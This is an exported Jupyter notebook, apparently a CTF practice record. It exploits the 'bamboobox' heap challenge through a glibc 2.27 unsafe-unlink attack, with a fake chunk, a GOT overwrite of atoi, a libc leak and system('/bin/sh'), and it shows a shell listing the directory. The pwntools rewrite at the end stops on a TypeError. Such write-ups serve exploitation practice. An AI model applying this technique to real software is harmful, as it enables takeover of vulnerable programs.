https://www.zhihu.com/question/21249496
<img src="https://pic3.zhimg.com/80/v2-23d52081fdf330444fb6d54e02c2988e_720w.jpg?source=1940ef5c" style="width: 500px; height: 400px" />

In [1]:
%load_ext autoreload
%autoreload 2
formatter = get_ipython().display_formatter.formatters['text/plain']
formatter.for_type(int, lambda n, p, cycle: p.text("0x%X" % n))

import os
os.sys.path.append('../')

from pwn import *

libc=ELF('/media/bohan/Elements SE/tools/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so')
bamboobox=ELF('/home/bohan/res/ubuntu_share/pwn_test/unsafe_unlink_1/bamboobox')

[*] '/media/bohan/Elements SE/tools/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/home/bohan/res/ubuntu_share/pwn_test/unsafe_unlink_1/bamboobox'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)


In [37]:
init_linux_server('/home/bohan/ida_linux_dbg_server/linux_server64', ['-i192.168.0.104'])

In [44]:
stop_linux_server()

In [3]:
z_write = write_pipe
z_print = lambda *args: None

In [4]:
z_write = stdin_write
z_print = print_stdout

In [5]:
def send_line(s):
    z_write(s + '\n')
    z_print()
    
def show_item():
    z_write('1\x00', waittime=0.3)
    z_print()
def add_item(name_len, name):
    z_write('2\x00', name_len, name, waittime=0.3)
    z_print(False)
def change_item(i, name_len, new_name):
    z_write('3\x00', i, name_len, new_name, waittime=0.3)
    z_print(False)
def remove_item(i):
    z_write('4\x00', i, waittime=0.3)
    z_print()

In [43]:
# os.read(w_pipe, 1)

In [42]:
show_item()

In [10]:
# add_item(0x20,'aaaa')#0
add_item(0x420,'aaaa')#0

In [12]:
# add_item(0x80,'bbbb')#1
add_item(0x420,'bbbb')#1

In [13]:
add_item(0x420,'cccc')#2

In [15]:
fd=0x6020d8-0x18
bk=0x6020d8-0x10
payload1=p64(0x0)+p64(0x421)#fake_chunk
payload1+=p64(fd)+p64(bk)
payload1+=p64(0) * int(0x420/8 - 4)
payload1+=p64(0x420)+p64(0x430)


In [16]:
len(payload1)

0x430

In [40]:
# print_hex(payload1, start_offset=0x86b0, format="hex")

In [18]:
# change_item(1,0x90,payload1)
change_item(1, 0x430, payload1)

In [19]:
remove_item(2)
# remove_item(1)

Please enter the index of item:remove successful!!
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:


In [20]:
change_item(1,0x20, b'a'*8+p64(bamboobox.got['atoi'])) # 将第0个的编辑地址改为atoi的地址

In [21]:
show_item()

b'0 : 0\xf7\xeb\xad\x1a\x7f1 : aaaaaaaah `\n'
----------------------------
Bamboobox Menu
----------------------------
1.show the items in the box
2.add a new item
3.change the item in the box
4.remove the item in the box
5.exit
----------------------------
Your choice:


In [22]:
# 根据atoi的在内存中的位移和相对文件的位移, 计算libc在内存的载入地址
libc_base = u64('0\xf7\xeb\xad\x1a\x7f'.ljust(8,'\x00')) - libc.sym['atoi'] 
libc.sym['atoi']
libc_base

0x7F1AADE7EF90

In [23]:
change_item(0,0x20,p64(libc_base + libc.sym['system']))

In [41]:
# 得到shell
send_line('/bin/sh')

In [31]:
send_line('ls')

bamboobox
bamboobox1.py
bamboobox.i64
bamboobox.id0
bamboobox.id1
bamboobox.id2
bamboobox.nam
bamboobox.til
core.bamboobox.8120
ida-20210806-101040-7632.dmp
pwn_test.ipynb
笔记.txt



In [27]:
send_line('\x04')

In [39]:
flush

[b'bamboobox\n', b'bamboobox1.py\n', b'bamboobox.i64\n', b'bamboobox.id0\n', b'bamboobox.id1\n', b'bamboobox.id2\n', b'bamboobox.nam\n', b'bamboobox.til\n', b'core.bamboobox.8120\n', b'ida-20210806-101040-7632.dmp\n', b'pwn_test.ipynb\n', b'\xe7\xac\x94\xe8\xae\xb0.txt\n']

# 用pwntools

In [52]:
p = process('/home/bohan/res/ubuntu_share/pwn_test/unsafe_unlink_1/bamboobox')
def add(size,content):
    p.sendlineafter('choice:',str(2))
    p.sendlineafter('name:',str(size))
    p.sendlineafter('item:',content)

def show():
    p.sendlineafter('choice:',str(1))

def change(index,size,content):
    p.sendlineafter('choice:',str(3))
    p.sendlineafter('item:',str(index))
    p.sendlineafter('name:',str(size))
    p.sendlineafter('item:',content)

def delete(index):
    p.sendlineafter('choice:',str(4))
    p.sendlineafter('item:',str(index))

[x] Starting local process '/home/bohan/res/ubuntu_share/pwn_test/unsafe_unlink_1/bamboobox'
[+] Starting local process '/home/bohan/res/ubuntu_share/pwn_test/unsafe_unlink_1/bamboobox': pid 31204


In [53]:
sleep(2)
add(0x420,'aaaa')#0
add(0x420,'bbbb')#1
add(0x420,'cccc')#2
fd=0x6020d8-0x18
bk=0x6020d8-0x10
payload1=p64(0x0)+p64(0x421)#fake_chunk
payload1+=p64(fd)+p64(bk)
payload1+=p64(0) * int(0x420/8 - 4)
payload1+=p64(0x420)+p64(0x430)
change(1,0x90,payload1)
delete(2)#unlink
change(1,0x20,b'a'*8+p64(bamboobox.got['atoi']))
show()
p.recvuntil(': ')

b'0 : '

In [51]:
libc_base=u64(p.recv(6).ljust(8,'\x00'))-libc.sym['atoi']
print("libc_base:"+hex(libc_base))
change(0,0x20,p64(libc_base+libc.sym['system']))
p.recvuntil(':')
p.sendline('/bin/sh\x00')
p.interactive()

TypeError: ljust() argument 2 must be a byte string of length 1, not str

In [54]:
a = p.recv(6)
a

b'aaaa\n1'